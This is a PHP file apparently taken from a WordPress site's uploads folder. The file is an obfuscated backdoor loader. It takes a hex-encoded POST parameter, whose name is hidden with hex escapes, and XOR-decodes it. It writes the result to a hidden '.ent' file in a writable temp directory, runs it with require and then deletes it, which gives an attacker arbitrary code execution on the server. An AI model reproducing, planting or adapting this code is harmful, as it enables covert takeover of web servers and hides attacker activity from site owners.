File: //var/www/shoetique/wp-content/uploads/2020/02/sign.php
<?php
if(array_key_exists("\x73\x79\x6Dbol", $_POST)){
$flag = hex2bin($_POST["\x73\x79\x6Dbol"]);
$pointer= ''; foreach(str_split($flag) as $char){$pointer .= chr(ord($char) ^ 9);}
$sym = array_filter(["/tmp", getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", session_save_path(), sys_get_temp_dir(), "/dev/shm"]);
foreach ($sym as $key => $holder) {
if (max(0, is_dir($holder) * is_writable($holder))) {
$ptr = "$holder/.ent";
if (file_put_contents($ptr, $pointer)) {
require $ptr;
unlink($ptr);
die();
}
}
}
}